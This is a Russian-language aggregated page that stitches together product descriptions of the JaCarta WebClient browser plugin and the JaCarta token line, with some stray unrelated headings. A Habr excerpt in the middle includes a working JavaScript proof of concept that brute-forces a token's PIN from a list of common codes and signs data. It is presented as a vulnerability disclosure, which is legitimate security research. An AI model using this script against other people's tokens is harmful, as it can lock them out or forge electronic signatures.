Jacarta Webclient
JaCarta — это не только защищённые носители электронной подписи, но и различное программное обеспечение. Одна из таких программ — JaCarta Webclient — обеспечивает web-страницам доступ к функциям USB-токенов и смарт-карт JaCarta.
Функции JaCarta Webclient
Разработчиком JaCarta Webclient выступает компания «Аладдин Р.Д.», та же, что выпускает и остальные продукты JaCarta. Компания-разработчик рассказывает основную информацию о продукте на своём сайте. Мы же выделим самое важное и интересное.
JaCarta Webclient — плагин, который интегрируется в web-приложения. С его помощью можно работать с электронной подписью и использовать строгую двухфакторную аутентификацию. Это важно, когда нужно безопасно провести какую-либо операцию или транзакцию в недоверенной среде. Эту безопасность обеспечивает взаимодействие между токеном, программой и веб-сайтами.
Webclient поддерживает работу со всеми продуктами JaCarta: USB-токенами и смарт-картами. В зависимости от используемого носителя, работать программа сможет как с российскими (ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012), так и с зарубежными (DES, 3DES, AES, SHA-1 и RSA) криптографическими алгоритмами.
Как использовать HttpClient класс в .NET
Безопасность обеспечивается строгой взаимной двухфакторной аутентификацией, шифрованием данных, полным отказом от небезопасной архитектуры NPAPI. PIN-коды не будут храниться в памяти web-страницы, а при отключении токена будет выполняться автоматический выход из личного кабинета.
Более подробно с принципами работы с JaCarta Webclient можно ознакомиться в руководстве пользователя.
Как установить WebClient JaCarta
Расскажем, как установить программу, если у вас Windows.
- Дистрибутив JaCarta Webclient скачать можно скачать на официальном сайте, в центре загрузки. Выберите тот, что подходит вашей системе.
- Запустите установочный файл и нажмите «Далее».
- Примите условия лицензионного соглашения и нажмите «Далее».
- Проверьте место установки программы, при необходимости измените его, а затем снова нажмите «Далее».
- Нажмите кнопку «Установить».
После этих действий компьютер лучше перезагрузить, после чего можно приступать к работе с программой.
Мы являемся официальным партнёром компании-производителя «Аладдин Р.Д.» и имеем все необходимые лицензии. Выбрать и купить носитель, который годится для использования в связке с JaCarta SecurLogon можно в нашем магазине → «Каталог носителей».
Источник: astral.ru
Jc webclient что это за программа
Опасные связи | Сезон 1 | Выпуск 29
В связи с техническими работами на сайте данные в прайс-листах могут быть неактуальными.
За актуальными прайс-листами просьба обращаться к курирующим менеджерам.
JC-WebClient |
JC-WebClient — решение для реализации функций строгой двухфакторной аутентификации, работы с ЭП и шифрования данных в Web-приложениях и облачных сервисах с использованием USB-токенов и смарт-карт семейства JaCarta или eToken. JC-WebClient — решение, позволяющее легко встроить в Web-приложения и облачные сервисы функции для работы с USB-токенами и смарт-картами JaCarta или eToken. С его помощью можно осуществлять строгую взаимную двухфакторную аутентификацию пользователя и Web-сервера, работать с усиленной и усиленной квалифицированной электронной подписью, безопасно подтверждать транзакции/операции при работе в недоверенной среде, а также шифровать данные с использованием российских или зарубежных криптоалгоритмов. Главное отличие JC-WebClient от конкурирующих решений — реализация единой технологии для работы с браузерами. За счёт этого JC-WebClient штатно поддерживает работу со всеми популярными браузерами: Google Chrome, Opera, «Яндекс.Браузер», Mozilla Firefox, Apple Safari, Microsoft Internet Explorer, Microsoft Edge, «Спутник» и др. Эта особенность позволяет избавить разработчиков от постоянных доработок своих Web-приложений под конкретный браузер, а пользователей — от проблем с выбором одного из нескольких вариантов дистрибутивов для установки. JC-WebClient работает на всех популярных платформах: Microsoft Windows, Apple macOS и GNU/Linux. Кроссплатформенность максимально расширяет аудиторию пользователей Web-приложений, так как им не нужно иметь определённую операционную систему — достаточно приобрести токены JaCarta и установить приложение JC-WebClient, что может сделать даже неподготовленный пользователь. Установка приложения JC-WebClient состоит из трёх простых шагов: необходимо зайти на нужный пользователю Web-сайт, скачать дистрибутив приложения JC-WebClient, запустить процесс установки и дождаться его окончания. Приложение работает в фоновом режиме и не требует от пользователя каких-либо действий по запуску или настройке. Сервис мониторинга, реализованный в составе JC-WebClient, контролирует целостность приложения и перезапускает его при возникновении нештатных ситуаций в операционной системе. Источник: cps.ru JC-WebClientЗапускает приложение JC-WebClient при загрузке операционной системы.
Опция «Антифрод-терминал» Trust Screen-устройство для безопасной аутентификации, работы с ЭП и подтверждения операций/транзакций в недоверенной среде.
В состав решения JC-WebClient входят устройства JaCarta-2 ГОСТ, JaCarta ГОСТ или eToken ГОСТ, сертифицированные во ФСТЭК России и ФСБ России. Сертификат соответствия ФСБ России № СФ/124-3112 Подтверждает, что СКЗИ «Криптотокен 2 ЭП» в составе JaCarta-2 ГОСТ соответствует требованиям ГОСТ 28147-89, ГОСТ Р 34.11-94, ГОСТ Р 34.10-2001, ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012, а также требованиям к СКЗИ класса КС1 и КС2 и требованиям к средствам ЭП класса КС1 и КС2 и может использоваться для криптографической защиты информации, не содержащей сведений, составляющих государственную тайну. Сертификат соответствия ФСБ России № СФ/111-2750 Подтверждает, что персональное средство ЭП «Криптотокен ЭП», предназначенное для использования совместно с СКЗИ «Криптотокен» в составе JaCarta ГОСТ (eToken ГОСТ), соответствует требованиям к средствам ЭП класса КС1 и КС2 и может использоваться для реализации функций электронной подписи в соответствии с 63-ФЗ «Об электронной подписи» от 6 апреля 2011 года. Сертификат соответствия ФСТЭК России № 2799 Подтверждает, что JaCarta является программно-техническим средством защиты информации, не содержащей сведений, составляющих государственную тайну, от несанкционированного доступа и соответствует требованиям по 4 уровню контроля отсутствия недекларированных возможностей (НДВ 4) и требованиям Технических условий. Microsoft
Linux
Apple
JaCarta
eToken
При работе с устройствами JaCarta-2 ГОСТ (средство ЭП «Криптотокен 2 ЭП»)
При работе с устройствами JaCarta ГОСТ и eToken ГОСТ (средство ЭП «Криптотокен ЭП»)
При работе с устройствами JaCarta PRO и eToken PRO (Java)
При встраивании в прикладное ПО СКЗИ или средств ЭП с использованием российских криптоалгоритмов разработчик должен иметь лицензию ФСБ России. Источник: it-enigma.ru Тестируем JaCarta WebClient или храните токены в сейфе«Когда на мгновение чёрный покров отнесло в сторону, Маргарита на скаку обернулась и увидела, что сзади нет не только разноцветных башен с разворачиващимся над ними аэропланом, но нет уже давно и самого города, который ушёл в землю и оставил по себе только туман.» М.А. Булгаков Привет, Хабр! Наверное почти в каждой российской организации есть эти изделия в весёлой разноцветной раскраске. Речь идёт об изделиях JaCarta и софте к ним. Привалило такое счастье и мне, и я решил немного раздвинуть чёрный покров скрывающий их сущность, сиречь API. Некоторые банки, особенно выдающие своим клиентам токены JaCarta ГОСТ-2, для работы требуют установки приложения JC-WebClient от «Аладдин Р.Д.». Хотя на официальном сайте разработчика свежего дистрибутива нет (в разделе Демо можно скачать более старую версию, но она использует устаревший API), дистрибутив можно найти с помощью гугла по строке «JC-WebClient-4.0.0.1186» на сайтах ДБО. После установки приложения на компе пользователя открывается порт 24738 на котором работает этот клиент. На сайте разработчика открыто и подробно описан API этого приложения (как и функции работы с файловой системой всей линейки токенов этого производителя через jcFS.dll, входящей в установочный пакет «Единый клиент JaCarta») и суть в том, что с помощью ряда функций можно или подписать ЭЦП находящейся на токене что угодно, подобрав пин код, или заблокировать токен неудачными попытками его ввода. И всё это дистанционно, через интернет. Не секрет, что пользователи часто оставляют у токена пин код по умолчанию, или тот с которым его получили (обычно боятся, что при смене пин кода всё перестанет работать). Чаще всего используются пин коды вида 123456, а токен в течении рабочего дня, а то и круглосуточно, воткнут в порт компа или usb хаба. Благодаря JC-WebClient, если такому пользователю подсунуть вебстраницу или письмо с нехитрым JavaScript’ом, то появляется возможность хотя и не получить ключи токена (это в ряде случаев возможно только путём непосредственного доступа к файловой системе токена, пример здесь уже давался), но попытаться подобрать пин код и подписать какие-либо данные и куда-то их отправить. В случае 10 неудачных попыток перебора токен блокируется, и как часто это бывает, если не установлен пин код администратора для разблокировки, то поможет только инициализация. А это не в срок уплаченные налоги (и как результат пени и даже блокировка расчётного счёта организации налоговой), неустойки от поставщиков, в общем хорошего мало. Проблему с перебором пин кода можно было бы решить или сделав возможность его ввода только через интерфейсное окно JC-WebClient, или как полумера, в случае например 3-х неудачных попыток его ввода, блокировать дальнейшую авторизацию, выведя сообщение пользователю, и ожидать пока он не подтвердит свои действия. Я написал небольшой тестовый скрипт, который показывает эту уязвимость. Скрипт работает на всех современных и относительно современных браузерах, даже IE 🙂 Естественно он ничего никуда не отправляет, а просто выводит на экран результаты работы последовательности функций. В скрипте реализован полный перебор 10 попыток ввода пин кода «на убой» токена, поэтому запускать скрипт можно только с тестовым токеном! Также следует помнить, что применение этого скрипта иначе кроме как на собственном тестовом токене является нарушением законодательства. Скрипт генерации ключевой пары и сертификата средствами JC-WebClient для тестирования. Перед началом тестирования необходимо установить JC-WebClient версии не ниже 4. //Инициализация JCWebClient2 JCWebClient2.initialize(); document.write(«JC-WebClient был успешно инициализирован»+» «); //Получаем версию JCWebClient2 var vers=JCWebClient2.getJCWebClientVersion(); document.write(«Версия JCWebClient2 » + vers +» «); //Получаем доступ к слотам и определяем число подключенных токенов var slots = JCWebClient2.getAllSlots(); document.write(«Подключено токенов: «+slots.length+» «); //Выводим модель токенов for (i = 0; i < slots.length; i++) < var slot = slots[i]; document.write(«Токен: «+slot.device.name+» «+slot.device.model+» «); >var tokenID = slot.id, // Идентификатор токена userPin = ‘111111’; // PIN-код пользователя // Проверить текущее состояние аутентификации на токене // (должно равняться JCWebClient2.Vars.AuthState.notBinded) var tokenState = JCWebClient2.getLoggedInState(); document.write(‘1) Token is binded: ‘ + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+» «); // Предъявить PIN-код JCWebClient2.bindToken( < args: < tokenID: tokenID, pin: userPin >>); // Проверить изменившееся состояние // (должно равняться JCWebClient2.Vars.AuthState.binded) tokenState = JCWebClient2.getLoggedInState(); document.write(‘2) Token is binded: ‘ + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+» «); // Создать контейнер с ключевой парой и присвоить ему имя var keyPairID = JCWebClient2.createKeyPair( < args: < paramSet: «XA», description: «my description», algorithm: JCWebClient2.Vars.KeyAlgorithm.GOST_2012_256 >>); // Задать отличительное имя пользователя (Distinguished Name (DN)), // включающее стандартное имя (Common Name, (CN)) var dn = < ‘CN’: ‘123’, ‘C’: ‘RU’ >; // Задать расширения, определяющие область применения закрытого ключа var exts = < ‘keyUsage’: ‘Digital Signature’ >; // Записать сертификат var contID = JCWebClient2.generateUserSelfSignedCertificate( < args: < keyPairID: keyPairID, dn: dn, exts: exts, days: 365 >>); //Массив информации на токенах var list=[]; //Получаем список контейнеров list = JCWebClient2.getContainerList( < args: < tokenID: tokenID >>); //Получаем id и информацию о созданном контейнере var data = list[0]; var contID = data.id; document.write(«ID контейнера: «+data.id+» «); document.write(«Описание контейнера: «+data.description+» «); document.write(«Алгоритм подписи: «+data.algorithm+» «); // Отменить ввод PIN-кода JCWebClient2.unbindToken(); И собственно сам скрипт аудита безопасности: //Инициализация JCWebClient2 JCWebClient2.initialize(); document.write(«JC-WebClient был успешно инициализирован»+» «); //Получаем версию JCWebClient2 var vers=JCWebClient2.getJCWebClientVersion(); document.write(«Версия JCWebClient2 » + vers +» «); //Получаем доступ к слотам и определяем число подключенных токенов var slots = JCWebClient2.getAllSlots(); document.write(«Подключено токенов: «+slots.length+» «); //Выводим модель токенов for (i = 0; i < slots.length; i++) < var slot = slots[i]; document.write(«Токен: «+slot.device.name+» «+slot.device.model+» «); >// Идентификатор токена var tokenID = slot.id; // Проверить текущее состояние аутентификации на токене // (должно равняться JCWebClient2.Vars.AuthState.notBinded) var tokenState = JCWebClient2.getLoggedInState(); document.write(‘Token is binded: ‘ + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+» «); //Массив информации на токенах var list=[]; //Получаем список контейнеров list = JCWebClient2.getContainerList( < args: < tokenID: tokenID >>); //Получаем id и информацию о контейнере var data = list[0]; var contID = data.id; document.write(«ID контейнера: «+data.id+» «); document.write(«Описание контейнера: «+data.description+» «); document.write(«Алгоритм подписи: «+data.algorithm+» «); // Данные для подписи (Hello World закодированное Base64) var dataToSign = ‘SGVsbG8sIFdvcmxkIQ==’; document.write(«Данные для подписи: «+dataToSign+» «); //Массив пин кодов var pin=[«1234567890», «123456», «1234567», «12345678», «123456789», «0987654321», «111111», «qwerty», «012345», «0123456», «01234567»]; //функция авторизации function bind(pass) < JCWebClient2.bindToken(< args: < tokenID: tokenID, pin: pass >>); > var i=0; //Перебор пин кодов в цикле //Осторожно! При 10 неверных попытках токен блокируется. while (i < 10) < i++; try< bind(pin[i]); tokenState = JCWebClient2.getLoggedInState(); //Если атака удалась, выводим результат и завершаем цикл if(tokenState.state=1) < document.write(«Успешно подобран пин код: «+pin[i]+» «); break; >> //Вывод информации об ошибке catch(e) > // Проверить изменившееся состояние // (должно равняться JCWebClient2.Vars.AuthState.binded) tokenState = JCWebClient2.getLoggedInState(); document.write(‘Token is binded: ‘ + (tokenState.state == JCWebClient2.Vars.AuthState.binded)+» «); //Получаем содерижимое сертификата var CertificateBody=JCWebClient2.getCertificateBody( < args: < id: contID >>); document.write(«CertificateBody: «+CertificateBody+» «); // Подписать данные, используя программное хэширование и вывести подписанное в Base64 var signedData = JCWebClient2.signBase64EncodedData( < args: < contID: contID, data: dataToSign, attachedSignature: true >>); document.write(«Подписано успешно. «); document.write(«Подписанные данные: «+signedData+» «); //Проверка подписи var signature = signedData; var res = JCWebClient2.verifyBase64EncodedData( < args: < signature: signature >>); document.write(«Результат проверки подписи: «+res+» «); // Отменить ввод PIN-кода JCWebClient2.unbindToken();
Источник: habr.com Обзор платформы JaCarta от Аладдин Р. Д.В данной статье рассматривается платформа JaCarta, поддерживающая технологии электронной подписи и строгой аутентификации, приводится краткий обзор продуктов и описание принципов их работы. ВведениеНа сегодняшний день без надежной системы аутентификации пользователей не обходится ни одна уважающая себя компания. Специалисты по информационной безопасности (ИБ) рекомендуют использовать многофакторную аутентификацию, основанную не только на знании секрета (пароля), но и на владении специальным устройством (токеном). Нередко в качестве третьего фактора выступает одна или несколько биометрических характеристик пользователя. В этом случае возникает проблема учета и регистрации всех аппаратных и программных средств аутентификации и хранения ключевой информации, используемых сотрудниками в масштабах предприятия. Еще одна тенденция в сфере ИБ связана с ростом числа мобильных устройств, с которых сотрудники компаний работают с конфиденциальной корпоративной информацией. Все чаще применяется модель BYOD (Bring Your Own Device), позволяющая сотруднику для выполнения своих профессиональных обязанностей использовать личные мобильные устройства. При этом появляется необходимость в механизме многофакторной аутентификации в отношении владельцев смартфонов или планшетов. Изменение законодательства в области защиты персональных данных, принятие требований по сертификации средств защиты информации, развитие дистанционного банковского обслуживания (ДБО) и интернет-банкинга требует от участников рынка внедрения отечественных систем аутентификации и электронной подписи (ЭП). Для эффективного решения поставленных задач российская компания «Аладдин Р. Д.» разработала платформу JaCarta — семейство аппаратных и программных продуктов, позволяющих осуществлять аутентификацию пользователей, генерировать ЭП и безопасно хранить криптографические ключи и цифровые сертификаты, а также централизованно управлять ключевыми носителями на протяжении их жизненного цикла. Состав продуктовой линейки JaCartaВ состав платформы JaCarta входят:
Токены JaCarta выпускаются в нескольких функционально идентичных исполнениях (форм-факторах): смарт-карта, USB-токен в корпусе Nano и XL, MicroUSB-токен, USB-токен с кнопкой (для JaCarta WebPass и JaCarta U2F). Большинство форм-факторов позволяют совмещать в одном устройстве несколько функций, что дает возможность сократить число ключевых носителей пользователя, реализуя необходимые функции в одном токене (например, двухфакторную аутентификацию и ЭП). Рисунок 1. Смарт-карта, USB- и MicroUSB-токены JaCarta MicroUSB-токены и смарт-карты JaCarta позволяют организовать строгую двух- и трехфакторную аутентификацию и усиленную квалифицированную ЭП на мобильных устройствах, обеспечивая защиту транзакций в условиях недоверенной среды. Для подключения смарт-карт JaCarta к мобильным устройствам можно использовать проводные или Bluetooth-считывателя смарт-карт. MicroUSB-токены JaCarta можно подключить напрямую (если есть порт MicroUSB) или через переходник MicroUSB-to-USB. На основе смарт-карт JaCarta выпускается решение Электронное удостоверение JaCarta, объединяющее функциональные возможности бесконтактного пропуска (за счет включения RFID-метки и интеграции со СКУД), средства доступа в информационную систему, средства ЭП, защищенного хранилища пользовательских данных, банковской карты и обычного удостоверения сотрудника. Компоненты платформы JaCarta имеют следующие сертификаты соответствия:
Токены и смарт-карты JaCarta PKIJaCarta PKI — семейство PKI-токенов и смарт-карт для строгой двухфакторной аутентификации пользователей в корпоративных системах, безопасного хранения ключевых контейнеров программных СКЗИ и цифровых сертификатов. Токены JaCarta PKI доступны форм-факторах USB-токен (в корпусе Nano или XL), MicroUSB-токен и смарт-карта. Подробная информация о линейке продуктов JaCarta PKI представлена на сайте производителя. Токены и смарт-карты JaCarta PKI/BIOТокены JaCarta PKI/BIO обладают всеми функциями токенов JaCarta PKI и отличаются от них функцией биометрической идентификации по отпечатку пальца (в качестве третьего фактора аутентификации или вместо PIN-кода). Могут поставляться в форм-факторах USB-токен (в корпусе XL) и смарт-карта. Рекомендуемым форм-фактором является смарт-карта, так как для USB-токенов необходимо предварительное тестирование на совместимость с используемыми сканерами (например, встроенными в ноутбуки или в клавиатуры). Подробная информация о линейке продуктов JaCarta PKI представлена на сайте производителя. Токены и смарт-карты JaCarta ГОСТ и JaCarta² ГОСТТокены JaCarta ГОСТ являются персональным средством ЭП со встроенной сертифицированной российской криптографией для формирования усиленной квалифицированной ЭП с неизвлекаемым ключом, а также хранения ключевых контейнеров программных СКЗИ. JaCarta² ГОСТ отличается применением сертифицированных новых российских криптографических алгоритмов ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012. JaCarta ГОСТ и JaCarta² ГОСТ производятся в нескольких форм-факторах: USB-токен (в корпусах Nano или XL), MicroUSB-токен, смарт-карта. И в JaCarta ГОСТ, и в JaCarta² ГОСТ криптоалгоритмы реализованы на уровне микропроцессора, а схема работы с неизвлекаемым закрытым ключом подписи исключает возможность хищения закрытого ключа подписи, при этом формирование ЭП с его использованием выполняется внутри устройства. Устройства предназначены для обеспечения юридической значимости действий пользователей при использовании различных электронных сервисов:
Смарт-карты JaCarta ГОСТ могут применяться как с обычными считывателями, так и с «Антифрод-терминалом» — снабженным дисплеем и клавиатурой устройством, предназначенным для формирования с помощью JaCarta ГОСТ ЭП в недоверенной среде. Подробная информация о линейке продуктов JaCarta ГОСТ и JaCarta² ГОСТ представлена на сайте производителя. Токены JaCarta WebPassJaCarta WebPass — USB-токены для генерации OTP, безопасного хранения сложного многоразового пароля и его подстановки в экранные формы по нажатию кнопки, а также запуска браузера и автоматического перехода по сохраненному адресу web-ресурса. Токены JaCarta WebPass поддерживают установку разных режимов работы в зависимости от характера нажатия кнопки: одинарное, двойное или длительное нажатие. По умолчанию, при одинарном нажатии генерируется OTP, а к остальным типам нажатия действия не назначены. Токены JaCarta U2FJaCarta U2F — универсальный USB-токен, предназначенный для осуществления двухфакторной аутентификации конечных пользователей онлайн-сервисов, поддерживающих стандарт FIDO U2F. К таким сервисам относятся сервисы Google (Google Cloud Platform, Gmail, Google Drive, YouTube, Google Wallet, Google+), облачный сервис Dropbox, хостинг совместной разработки GitHub. В отличие от PKI-токенов JaCarta U2F поддерживают самостоятельную регистрацию пользователей — при регистрации токена JaCarta U2F на конкретном web-ресурсе не требуется участия администратора. В процессе регистрации пользователем своего U2F-токена на web-ресурсе происходит генерация ключевой пары (открытый и закрытый ключ) без сертификата открытого ключа. Сгенерированная ключевая пара используется для дальнейшей аутентификации. В связи с этим один токен может использоваться для доступа к множеству различных web-ресурсов. Токены JaCarta U2F обеспечивают защиту от фишинговых атак, поскольку закрытый ключ, хранящийся в памяти токена, соответствует URL-адресу определенного web-ресурса. Основные компоненты типового решения с поддержкой U2F-аутентификации на базе токена JaCarta U2F представлены ниже. Рисунок 2. Архитектура типового решения с поддержкой U2F-аутентификации на базе токена JaCarta U2F В состав типового решения с поддержкой U2F-аутентификации на базе токена JaCarta U2F входят следующие компоненты:
Один токен JaCarta U2F можно применять для ПК, ноутбуков и мобильных устройств (при наличии USB-разъема или MicroUSB-разъема). При этом поддержка U2F обеспечивается из соответствующего приложения (например, Google Chrome). Подробная информация о JaCarta U2F и описание принципов работы доступны на сайте производителя. Таблица 1. Сравнение моделей токенов JaCarta Источник: www.anti-malware.ru |